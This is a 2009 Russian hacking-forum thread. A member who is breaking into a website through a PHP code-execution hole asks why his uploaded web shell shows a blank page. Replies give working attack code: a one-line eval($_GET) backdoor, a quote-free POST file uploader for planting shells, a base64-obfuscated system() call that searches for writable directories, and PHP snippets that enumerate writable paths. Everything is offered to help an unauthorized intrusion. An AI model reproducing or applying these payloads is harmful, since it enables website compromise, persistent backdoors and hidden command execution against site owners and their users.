13.09.2009, 22:17
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами:
10018169
Репутация:
1680
|
|
Итак господа, при взломе очередного сайта я наткнулся на очередной ребус, который разгадать не могу.
Значит дырка выполнение php кода, пытаюсь залить шелл через такую конструкцию:
fputs(fopen('/www/shell.php',a),base64_decode('B64CODE'));
Шелл заливается нормально, но при попытке зайти на него, белая страница. Дело явно не в .htaccess и не в правах файла.
Если таким образом залить простой сценарий:
Код:
<?php
echo 'LOL';
?>
То он успешно выполняется, но если залить такой:
Код:
<?php
eval($_GET['lol']);
?>
То белая страница. Вот и всё...
Удалённого инклуда нету, через copy тоже самое, wget не работает вообще... Какие мысли на этот счёт у кого?
Лично я с таким сталкиваюсь впервые. |
|
|
13.09.2009, 22:52
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от Nightmarе
То белая страница. Вот и всё...
Ну а что там должно быть-то?
Сообщение от FriLL
и вообще должна быть ошибка Undefended variable $_GET['lol']
Не обязательно. Как раз белая страница может быть запросто
Сообщение от Pashkela
неоднакратно натыкался на фильтрацию GET или просто запрет записи в файл именно "GET"
Покажешь пример?
|
|
|
|
13.09.2009, 16:40
|
|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами:
10058786
Репутация:
4589
|
|
http://quest.fsb-my.name/code.php
|
|
|
|
13.09.2009, 22:35
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
GET запросы могут фильтроваться. В смысле просто слово GET
Попробуй действовать через пост, например так:
<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go></form><?if(isset($_POST[go])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}}?>
PS: неоднократно натыкался на фильтрацию GET или просто запрет записи в файл именно "GET"
В общем рыть в сторону POST вариантов, имхо
ЗЫЖ Плюс
eval($_GET['lol']);
можно смело заменить на
eval($_GET[lol]);
в прямом и переносном смысле - может быть будет другой результат, не мне тебе объяснять, что каждая ситуация всегда практически уникальна
Эксперементировать с ? и & после сам знаешь чего - как не тупо бы выглядело бы - результат иногда разный
Последний раз редактировалось Pashkela; 13.09.2009 в 22:53..
|
|
|
|
13.09.2009, 22:55
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами:
10018169
Репутация:
1680
|
|
Сообщение от Pashkela
eval($_GET[lol]);
ЧУДО! Спс, вот до этого я не допёр. Да, теперь этот код пашет. Но проблемма с заливкой нормального шелла всё ещё стоит...
|
|
|
|
13.09.2009, 22:41
|
|
Познающий
Регистрация: 14.09.2008
Сообщений: 30
С нами:
9292499
Репутация:
21
|
|
<?php
eval($_GET['lol']);
?>
а что ты передаеш в lol ??
и вообще должна быть ошибка Undefended variable $_GET['lol']
|
|
|
|
13.09.2009, 22:56
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
jokester:
Покажешь пример?
Зачем? Вы же ГУРУ хакинга, наверное, даже скорее всего я несу бред. Но сегодня простительно  Всех с праздником!
|
|
|
|
13.09.2009, 23:04
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Но проблемма с заливкой нормального шелла всё ещё стоит...
скорее всего только с правами на запись в папку, выполни такой код, чтобы найти сам знаешь что:
Поиск папки, доступной на запись:
0)<?
// это system('cd ../; find . -perm -2 -type d -ls');
eval(base64_decode(c3lzdGVtKCdjZCAuLi87IGZpbmQgLiA tcGVybSAtMiAtdHlwZSBkIC1scycpOw));
?>
1) $dirs=scandir($_SERVER['DOCUMENT_ROOT']);foreach($dirs as $whot) {if(is_dir($whot) && is_writable($whot)){echo "writeable dir: $whot";}}
2) echo '<pre>';$path = '/абсолютный_путь/http';function fold($rootDir, $allData=array()){$invisibleFileNames = array(".", "..");$dirContent = scandir($rootDir);foreach($dirContent as $key => $content){$path = $rootDir.'/'.$content;if(!in_array($content,$invisibleFileNam es)){if(is_file($path) && is_writable($path)){$allData[] = $path; }elseif(is_dir($path) && is_writable($path)){$allData = fold($path, $allData);}}}return $allData;}$a = fold($path);print_r($a);echo '</pre>';
|
|
|
|
13.09.2009, 23:07
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами:
10018169
Репутация:
1680
|
|
Про запись в папку это и так думаю понятно, в противном случае я никаких файлов создать бы там не смог. Папка на запись есть.
Но судя по всему даже через Базу 64 образуется типа \' что то в этом роде, что и делает скрипт нерабочим... хз даже чё тут придумать.
|
|
|
|
13.09.2009, 23:10
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
ну дык ты попробововал вот этот код без кавычек?
<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go></form><?if(isset($_POST[go])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}}?>
если зальешь в туже папку, откуда он исполняется - должно быть ок. В смысле торможу щаз децл, просто трудно оценивать не видя реальной ситуцации
Если реагирует на то, что в коде шелла/загрузчика есть кавычки - избавиться от кавычек. Имхо.
Последний раз редактировалось Pashkela; 13.09.2009 в 23:12..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
